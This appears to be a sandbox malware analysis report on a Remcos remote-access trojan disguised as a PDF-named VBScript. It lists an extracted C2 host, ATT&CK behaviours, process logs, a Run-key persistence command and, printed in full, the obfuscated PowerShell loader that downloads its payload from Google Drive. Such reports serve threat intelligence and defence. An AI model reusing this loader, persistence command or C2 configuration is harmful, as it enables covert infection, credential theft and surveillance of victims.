remcos | 1fc6fbf92722053225d14b53d960a903f9ff7b1cf4bb2f626634af38f31d333c

Analysis

max time kernel
299s
max time network
297s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30-11-2024 03:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

證據_89004161-000002102-66_20241128·pdf.vbs
Size

33KB
MD5

b87c82bba48c44f8fc387ecd6100ff0e
SHA1

2cdcb7b8b4f5a8b0501a121b6b4264aa7c6b2f57
SHA256

20100ee5a74b50849ea1a00363a6751320c9aab43ba31859f79147af1b56b509
SHA512

442d105706dcc997c39a141d7a944bbb961e8948d15caee81814f1a6d6245e46b00bf98e893c1623bd92b12b1ac440432fd26f4fd9166c5ffea8ac9a575af189
SSDEEP

768:5KSasMUqkx36r142byXNoPNhZqpCtHki2ynMVVX09rkFJC:ISas/RF6hWyPN/MbZ09oFM

Score

10^/10

remcos remotehost collection credential_access discovery evasion persistence rat stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

8766e34g8.duckdns.org:3782

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-93TSMD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

Processes:

resource	yara_rule
behavioral2/memory/2480-199-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/864-206-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/1120-200-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral2/memory/1120-200-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/2480-199-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 13 IoCs

Processes:

WScript.exepowershell.exemsiexec.exe

flow	pid	Process
3	4384	WScript.exe
7	4656	powershell.exe
9	4656	powershell.exe
30	64	msiexec.exe
33	64	msiexec.exe
35	64	msiexec.exe
37	64	msiexec.exe
39	64	msiexec.exe
48	64	msiexec.exe
49	64	msiexec.exe
50	64	msiexec.exe
51	64	msiexec.exe
53	64	msiexec.exe

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

Processes:

Chrome.exeChrome.exeChrome.exemsedge.exemsedge.exemsedge.exemsedge.exeChrome.exemsedge.exe

pid	Process
3328	Chrome.exe
3480	Chrome.exe
3624	Chrome.exe
2692	msedge.exe
1072	msedge.exe
2900	msedge.exe
3432	msedge.exe
548	Chrome.exe
2076	msedge.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

msiexec.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Emboldened% -windowstyle 1 $Melolonthinae=(gp -Path 'HKCU:\\Software\\lestiwarite\\').Generalljtnanten;%Emboldened% ($Melolonthinae)"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
6	drive.google.com
7	drive.google.com
30	drive.google.com

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

msiexec.exe

pid	Process
64	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exemsiexec.exe

pid	Process
3824	powershell.exe
64	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

msiexec.exe

description	pid	Process	procid_target
PID 64 set thread context of 2480	64	msiexec.exe	121
PID 64 set thread context of 1120	64	msiexec.exe	122
PID 64 set thread context of 864	64	msiexec.exe	124

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

reg.exemsiexec.exemsiexec.exereg.execmd.exemsiexec.exepowershell.exemsiexec.execmd.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Chrome.exemsedge.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exe

pid	Process
1528	reg.exe
3484	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exemsiexec.exeChrome.exe

pid	Process
4656	powershell.exe
4656	powershell.exe
3824	powershell.exe
3824	powershell.exe
3824	powershell.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
548	Chrome.exe
548	Chrome.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe

Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

powershell.exemsiexec.exe

pid	Process
3824	powershell.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe
64	msiexec.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid	Process
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe
2692	msedge.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

powershell.exepowershell.exeChrome.exemsiexec.exe

description	pid	Process
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeDebugPrivilege	3824	powershell.exe
Token: SeShutdownPrivilege	548	Chrome.exe
Token: SeCreatePagefilePrivilege	548	Chrome.exe
Token: SeShutdownPrivilege	548	Chrome.exe
Token: SeCreatePagefilePrivilege	548	Chrome.exe
Token: SeDebugPrivilege	864	msiexec.exe
Token: SeShutdownPrivilege	548	Chrome.exe
Token: SeCreatePagefilePrivilege	548	Chrome.exe
Token: SeShutdownPrivilege	548	Chrome.exe
Token: SeCreatePagefilePrivilege	548	Chrome.exe
Token: SeShutdownPrivilege	548	Chrome.exe
Token: SeCreatePagefilePrivilege	548	Chrome.exe
Token: SeShutdownPrivilege	548	Chrome.exe
Token: SeCreatePagefilePrivilege	548	Chrome.exe
Token: SeShutdownPrivilege	548	Chrome.exe
Token: SeCreatePagefilePrivilege	548	Chrome.exe
Token: SeShutdownPrivilege	548	Chrome.exe
Token: SeCreatePagefilePrivilege	548	Chrome.exe
Token: SeShutdownPrivilege	548	Chrome.exe
Token: SeCreatePagefilePrivilege	548	Chrome.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

Chrome.exemsedge.exe

pid	Process
548	Chrome.exe
2692	msedge.exe
2692	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

msiexec.exe

pid	Process
64	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exemsiexec.execmd.execmd.exeChrome.exe

description	pid	Process	procid_target
PID 4384 wrote to memory of 4656	4384	WScript.exe	83
PID 4384 wrote to memory of 4656	4384	WScript.exe	83
PID 3824 wrote to memory of 64	3824	powershell.exe	100
PID 3824 wrote to memory of 64	3824	powershell.exe	100
PID 3824 wrote to memory of 64	3824	powershell.exe	100
PID 3824 wrote to memory of 64	3824	powershell.exe	100
PID 64 wrote to memory of 3564	64	msiexec.exe	103
PID 64 wrote to memory of 3564	64	msiexec.exe	103
PID 64 wrote to memory of 3564	64	msiexec.exe	103
PID 3564 wrote to memory of 1528	3564	cmd.exe	106
PID 3564 wrote to memory of 1528	3564	cmd.exe	106
PID 3564 wrote to memory of 1528	3564	cmd.exe	106
PID 64 wrote to memory of 2528	64	msiexec.exe	108
PID 64 wrote to memory of 2528	64	msiexec.exe	108
PID 64 wrote to memory of 2528	64	msiexec.exe	108
PID 2528 wrote to memory of 3484	2528	cmd.exe	110
PID 2528 wrote to memory of 3484	2528	cmd.exe	110
PID 2528 wrote to memory of 3484	2528	cmd.exe	110
PID 64 wrote to memory of 548	64	msiexec.exe	111
PID 64 wrote to memory of 548	64	msiexec.exe	111
PID 548 wrote to memory of 4044	548	Chrome.exe	112
PID 548 wrote to memory of 4044	548	Chrome.exe	112
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3036	548	Chrome.exe	113
PID 548 wrote to memory of 3592	548	Chrome.exe	114
PID 548 wrote to memory of 3592	548	Chrome.exe	114
PID 548 wrote to memory of 3092	548	Chrome.exe	115
PID 548 wrote to memory of 3092	548	Chrome.exe	115
PID 548 wrote to memory of 3092	548	Chrome.exe	115
PID 548 wrote to memory of 3092	548	Chrome.exe	115
PID 548 wrote to memory of 3092	548	Chrome.exe	115
PID 548 wrote to memory of 3092	548	Chrome.exe	115
PID 548 wrote to memory of 3092	548	Chrome.exe	115
PID 548 wrote to memory of 3092	548	Chrome.exe	115
PID 548 wrote to memory of 3092	548	Chrome.exe	115
PID 548 wrote to memory of 3092	548	Chrome.exe	115

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\證據_89004161-000002102-66_20241128·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Sidebemrkninger='Limation';;$Antileptic='Brnebogspris';;$trapperummet='Slighty';;$Clarioning='Nonlucidity';;$Godmothership='Sndagsbarns';;$Designformatet=$host.Name;function Bibiann($Macruranmpester){If ($Designformatet) {$Nailsmith=4} for ($Macruran=$Nailsmith;;$Macruran+=5){if(!$Macruranmpester[$Macruran]) { break }$Tilsynsassistenter+=$Macruranmpester[$Macruran]}$Tilsynsassistenter}function Remanufactures139($Stradine){ .($Rechecking) ($Stradine)}$Jeremiah=Bibiann 'Pir NLoneeA.sktCili. Hosw CateArchBUklaCOrd LLienILuggeForkNRemaT';$Stiligeres=Bibiann 'UdlaMHetaoCdroza laiTilblUngllStruaP tt/';$Overfertilizes=Bibiann 'EthoT C,tlFordsInfe1Svin2';$Widens=' Awa[Ge,bnUnisEChirTWyn,.NoncsBl ue Bitr MenVarchiRestcAfh eAntipTilsODampi TubnAho.tOrdsMDrbeAAclinSlgtA toeGI,anERegeR Dom] rkk:Core:S rosGabeeMedicNon,UPo,dR orsiHimmT,araYTaenPStorRBjero,urit retOSaf cM tooBje LYoke=Seve$Pud ODe,iVIdioeAks,rSolsfYowlEKuriRBrneTSndriFriaL Udsi ArgZBrute ovS';$Stiligeres+=Bibiann ' Dis5Snup.Kast0Mono Exec(Sin.WKueti.lidnRessdS ejo RenwUnadsVaer S alN orkT Sun Bunk1.fbe0Mies.Trop0hyd ; ni OrgaWUnmoiResinTung6 Sku4Ve n;A,ai TrakxTi s6Ov r4 K a;Hydr KliprOprevHas :Dur 1Tone3.tne1toss.Sank0 hio)Svre .lecGCe teEddicsnekkBi loGeog/ B t2Uns.0Omve1Ca a0Pate0Misa1Tilm0Ndla1Skrk PreFMut iRagfrUnsoe esyfUni.o UdgxT om/Ste 1Folk3Tilm1Fibe.prin0';$Collossians=Bibiann 'Ti suInsusbramE K,oRDeta-Syn ADrivG resE,tumNOpl,t';$Tvrfagenes=Bibiann 'K lahCaratEnt,tP tepStalsFi k:Chok/Capn/ NirdD idrUnkiiT devTr eeBa z.Smedg ImmoElekoTentgC nflKonce Int.Toluc WunoSheemForh/TathuJollcBrne?StraeT ksxKamap Sc.o d,ir SkytC,oa=GladdLa,toKro wBrannUnaplKol ok ndaIndld Ka &MckiiSad dOp i=Raad1TrskkDrafWdesiHAdenCContK TotcSe,vwAfhnXDoubhA ylONon k asi2gu.mu PaaQUngawSka fShet6M skN GulzMel.P SuuKsubc0Lsse5Baci5AletuSwasU kalO.ilghS am4MaltMRettaSoci5';$Majesttsfornrmelser=Bibiann ' rnr>';$Rechecking=Bibiann 'Fle,iLehreHuemX';$Velin127='Kheda';$Orismology='\Epitympanum.Ply';Remanufactures139 (Bibiann ' St $ScumgAr eLsprooWassbEmb ABlomLOpk.: Od sGr vVSterRSwariJungnGulddStjrU EtnSBro.TVarirTraniMackEDet r Ults ,nd=,ade$Unmae So N finvPris: ndaUdtrp EftpAnn d veadignTStigASt t+Renm$StatO,askrA,orI.repS roM yrtoEl,xLpartoBoblGaftey');Remanufactures139 (Bibiann 'A,tr$ StaG CurLFurmOUpaaBF,ora Gi.l omo: edWGuesaunwiMV.lgeForefEnfiuTyreLOutwSCeph2What4Oxid2 obi=Kuns$ asTCou V Fl.R Eksf Reva.vidg vanEOptrnPlage antSFlj,.ExamSHumppTweeL VeriTry tLyre(Deve$IntiM ManaSexpj InteAr eS tatbl nTMasssLibbF Earoefe,rKeraN nrarAdelMcrouEV llLoversLab,eSexbRVint)');Remanufactures139 (Bibiann $Widens);$Tvrfagenes=$Wamefuls242[0];$hydrazoic=(Bibiann 'r gs$Vkstg SweLsej o eprBPsy,ASpgsLLitr:.sotGPr,nACsarVPaliEUncokCissaHavfLShareSt tnM lidBilleCompRMy l=Dis.NInteeIngewhort- AttoPhylbRmebJF,rtEGe.iC T iTIn,b Mi.SCotaYSoutsAgrit MareI,admP.la.Yder$Nordj SteE BlirsammeSa am kspIUnmoaUdsmH');Remanufactures139 ($hydrazoic);Remanufactures139 (Bibiann 'Oppa$ unGPostaSkr vUnr eG,ulk ounaNo plHo eeOpb nPosedOrdreKelvr ene.JagtH HeteFlaraArr dskrieRevirStams D a[Udra$ AnoC rkeo MeklObscl lio D asobs sShetiFr,gaChrynVa isSh,r]N ig=Etru$Spe SN.dst DebiVrvll stri ollg StoeAarsr Gade pas');$Spadestikkets246=Bibiann ' J b$ EukGKemoaAfs vBad eSolskEn,la VallE ste Wh nRet dsandeViderMan..SmndDSkedoFlemwScrinAlpelSk ioProna rafdCrimFAgaiiParalAngaefl e(Tr p$ShasT ejv A trS,ttfclera ichgR ndeO,ernSun.eTegls Est,Samm$SelvI Forn SofdBe peP,eukSectsSki eRavnrDokki A fnmorgg.ppreForpnTr fsFusk)';$Indekseringens=$Svrindustriers;Remanufactures139 (Bibiann 'Biog$FredGGushLUnreORealBIldsaBu mL ,as:Attok roOEerim BrupEmo,LA,uaeReg.M IncEMongn A fTinteVChefIafstNGrevkKapiL racEKd rrU,icNVealeAllis,pro= mm(SrloTIndkeUbetSP ovTPle.-ef mp,ireaVaadtHintHerup Kata$ UndiUticn U,sDEpiteAu,oK mimSHyldECavarSta,iFl.mNStraG Ta,EDrimnR.geSYeao)');while (!$Komplementvinklernes) {Remanufactures139 (Bibiann 'Sisk$ B rgRstelHansoSurrbSlgtaSau.l sca: OffPTreka M,lrDispaUdr p EkstBadeeLydbr Idea Le lPian=Port$ DisHAtt a.emel.tdteHerbtPre u IntdHe.msE ple') ;Remanufactures139 $Spadestikkets246;Remanufactures139 (Bibiann 'PyresF tiTJordaSpisrPremtFi b-WolfST ndlP,tbe SememadkP Sva hypa4');Remanufactures139 (Bibiann 'Anti$ losgIrreLNulloDe iBD.elASa dLPung: AllK D.toSavnMHo ePMauvLSljdEupo,mBackEw.etn MrkTAminvradiiVestnOldskStorLBaljeIndlrPrecnUna,ER krsMaen= Udf(TnkeT indE StvSPromt inn-TagspTogvaKarttKlinhRegr ,rre$S riIAkkvN FladEphoeSos kSt lS KonEOm,lrMoorIbrutNProdgjorde HumNAct sSlag)') ;Remanufactures139 (Bibiann 'Wret$CarggCleaLSiruoKwapBAmorA Fjal,ksp: PlyiCultNAl oFReshLToppeUpo CBrakTDhanE eldd For=M,rr$BehoGMenul,rnrO humbMasoaMas,lA te:S,lfwCensoT,rio Mo,dH.apG An,O M kLNonfED ctmB ni+Kvrk+Ho e%m ll$Vik.WUnarAFar.M.dble.rodFIm ru k.nLaposSStri2Desi4 Kva2Preb. A,vcStano RinUPr cnSme t') ;$Tvrfagenes=$Wamefuls242[$Inflected]}$Ryddeliges=280530;$Brickwork=30269;Remanufactures139 (Bibiann 'Herr$Sm lgRelalForuo U obBiblAArrolIhuk:Garno KompKollr KriR,eucSAffiS DortHemaI nsFMispTKrake ChuRDice8Insp0ss n Phar= Ama IndsgKakkeTyreThigh- Po cExamO ,itnDa,kTBulbeSaxoN.creT Uds Si j$SlutIEighNceraDMu leI stk TansSammEBredrPas ILigbn ropgSlouEKaleNS ips');Remanufactures139 (Bibiann ' I a$Sangg Dejl rvlonor bSolhaForslRec : N dDHa myBiblsGroufRehaaUndesHam iLeersTheo .ent= Dat hv s[OmdbSSludy armsNedstmbeleAbenmSpid. OpsCSkipoNdstn Po,vprobePrgnrFunkt Fer] arv:u.or:UnliF ,ibr BonoPyt,mI lgB ervaunresTilfeSme,6Doce4BulnS istUdmar S mi DernHerigLogf(H.rk$Eu.oO D spXylorKommrH emsForvs,hontVensiSalgf subt Tawe Halr Rew8U,op0rets)');Remanufactures139 (Bibiann ' Inq$Vineg MaslSideONonrBMyreaHel L Khi:haanp ederUndiOYndlpParaO ourrForstNonfiCircoMicrNMu saJuniB Be iKatoLForvIErrot SarYOutl2Forg4Fr g5Inte dfr=Cygn Bi f[SlavsSu jYSkgvSFremtLoboESeelm,fre.HypeTD saeCompxMeruT la.RoutEVirvnpr icFjlmOGeosDreaki supnomnigK rt]Unev:Ljtn:U puAHumoSTra,CSweeiPersIDac .Sch.G ConE P,nTMultsSnapTRigarIn,eI hrNUppeGGuln( Kon$TreddHingYOrbiSPjadF MaiAafflSLetfIAndosKvad)');Remanufactures139 (Bibiann 'Ochr$ Svrg TrvLM ckOAccebHemoaExcoLLith:TackgNeptr BioUU.hntSkvmnDybdIHoffNGynegAntieGrafNF.risSkep=Or a$ SeePTrenRRu.kODesuPun aOTootr,ocit M tiVarmO HalN.limaSuccbFac IrefeLMasciGo pTK aly ,et2Inte4bibl5Midt.,ntisTheruDiabB Pe sA ettMeshrC nhi Menn BurG Fes(De a$ ankRAngiYAaredTranD,rigEGlocL othiSatsgflooE Pres Det,Hemi$ ChaBUnveRSulciRoknc R sKSvanWDrisoGal R epKSem.)');Remanufactures139 $Grutningens;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Sidebemrkninger='Limation';;$Antileptic='Brnebogspris';;$trapperummet='Slighty';;$Clarioning='Nonlucidity';;$Godmothership='Sndagsbarns';;$Designformatet=$host.Name;function Bibiann($Macruranmpester){If ($Designformatet) {$Nailsmith=4} for ($Macruran=$Nailsmith;;$Macruran+=5){if(!$Macruranmpester[$Macruran]) { break }$Tilsynsassistenter+=$Macruranmpester[$Macruran]}$Tilsynsassistenter}function Remanufactures139($Stradine){ .($Rechecking) ($Stradine)}$Jeremiah=Bibiann 'Pir NLoneeA.sktCili. Hosw CateArchBUklaCOrd LLienILuggeForkNRemaT';$Stiligeres=Bibiann 'UdlaMHetaoCdroza laiTilblUngllStruaP tt/';$Overfertilizes=Bibiann 'EthoT C,tlFordsInfe1Svin2';$Widens=' Awa[Ge,bnUnisEChirTWyn,.NoncsBl ue Bitr MenVarchiRestcAfh eAntipTilsODampi TubnAho.tOrdsMDrbeAAclinSlgtA toeGI,anERegeR Dom] rkk:Core:S rosGabeeMedicNon,UPo,dR orsiHimmT,araYTaenPStorRBjero,urit retOSaf cM tooBje LYoke=Seve$Pud ODe,iVIdioeAks,rSolsfYowlEKuriRBrneTSndriFriaL Udsi ArgZBrute ovS';$Stiligeres+=Bibiann ' Dis5Snup.Kast0Mono Exec(Sin.WKueti.lidnRessdS ejo RenwUnadsVaer S alN orkT Sun Bunk1.fbe0Mies.Trop0hyd ; ni OrgaWUnmoiResinTung6 Sku4Ve n;A,ai TrakxTi s6Ov r4 K a;Hydr KliprOprevHas :Dur 1Tone3.tne1toss.Sank0 hio)Svre .lecGCe teEddicsnekkBi loGeog/ B t2Uns.0Omve1Ca a0Pate0Misa1Tilm0Ndla1Skrk PreFMut iRagfrUnsoe esyfUni.o UdgxT om/Ste 1Folk3Tilm1Fibe.prin0';$Collossians=Bibiann 'Ti suInsusbramE K,oRDeta-Syn ADrivG resE,tumNOpl,t';$Tvrfagenes=Bibiann 'K lahCaratEnt,tP tepStalsFi k:Chok/Capn/ NirdD idrUnkiiT devTr eeBa z.Smedg ImmoElekoTentgC nflKonce Int.Toluc WunoSheemForh/TathuJollcBrne?StraeT ksxKamap Sc.o d,ir SkytC,oa=GladdLa,toKro wBrannUnaplKol ok ndaIndld Ka &MckiiSad dOp i=Raad1TrskkDrafWdesiHAdenCContK TotcSe,vwAfhnXDoubhA ylONon k asi2gu.mu PaaQUngawSka fShet6M skN GulzMel.P SuuKsubc0Lsse5Baci5AletuSwasU kalO.ilghS am4MaltMRettaSoci5';$Majesttsfornrmelser=Bibiann ' rnr>';$Rechecking=Bibiann 'Fle,iLehreHuemX';$Velin127='Kheda';$Orismology='\Epitympanum.Ply';Remanufactures139 (Bibiann ' St $ScumgAr eLsprooWassbEmb ABlomLOpk.: Od sGr vVSterRSwariJungnGulddStjrU EtnSBro.TVarirTraniMackEDet r Ults ,nd=,ade$Unmae So N finvPris: ndaUdtrp EftpAnn d veadignTStigASt t+Renm$StatO,askrA,orI.repS roM yrtoEl,xLpartoBoblGaftey');Remanufactures139 (Bibiann 'A,tr$ StaG CurLFurmOUpaaBF,ora Gi.l omo: edWGuesaunwiMV.lgeForefEnfiuTyreLOutwSCeph2What4Oxid2 obi=Kuns$ asTCou V Fl.R Eksf Reva.vidg vanEOptrnPlage antSFlj,.ExamSHumppTweeL VeriTry tLyre(Deve$IntiM ManaSexpj InteAr eS tatbl nTMasssLibbF Earoefe,rKeraN nrarAdelMcrouEV llLoversLab,eSexbRVint)');Remanufactures139 (Bibiann $Widens);$Tvrfagenes=$Wamefuls242[0];$hydrazoic=(Bibiann 'r gs$Vkstg SweLsej o eprBPsy,ASpgsLLitr:.sotGPr,nACsarVPaliEUncokCissaHavfLShareSt tnM lidBilleCompRMy l=Dis.NInteeIngewhort- AttoPhylbRmebJF,rtEGe.iC T iTIn,b Mi.SCotaYSoutsAgrit MareI,admP.la.Yder$Nordj SteE BlirsammeSa am kspIUnmoaUdsmH');Remanufactures139 ($hydrazoic);Remanufactures139 (Bibiann 'Oppa$ unGPostaSkr vUnr eG,ulk ounaNo plHo eeOpb nPosedOrdreKelvr ene.JagtH HeteFlaraArr dskrieRevirStams D a[Udra$ AnoC rkeo MeklObscl lio D asobs sShetiFr,gaChrynVa isSh,r]N ig=Etru$Spe SN.dst DebiVrvll stri ollg StoeAarsr Gade pas');$Spadestikkets246=Bibiann ' J b$ EukGKemoaAfs vBad eSolskEn,la VallE ste Wh nRet dsandeViderMan..SmndDSkedoFlemwScrinAlpelSk ioProna rafdCrimFAgaiiParalAngaefl e(Tr p$ShasT ejv A trS,ttfclera ichgR ndeO,ernSun.eTegls Est,Samm$SelvI Forn SofdBe peP,eukSectsSki eRavnrDokki A fnmorgg.ppreForpnTr fsFusk)';$Indekseringens=$Svrindustriers;Remanufactures139 (Bibiann 'Biog$FredGGushLUnreORealBIldsaBu mL ,as:Attok roOEerim BrupEmo,LA,uaeReg.M IncEMongn A fTinteVChefIafstNGrevkKapiL racEKd rrU,icNVealeAllis,pro= mm(SrloTIndkeUbetSP ovTPle.-ef mp,ireaVaadtHintHerup Kata$ UndiUticn U,sDEpiteAu,oK mimSHyldECavarSta,iFl.mNStraG Ta,EDrimnR.geSYeao)');while (!$Komplementvinklernes) 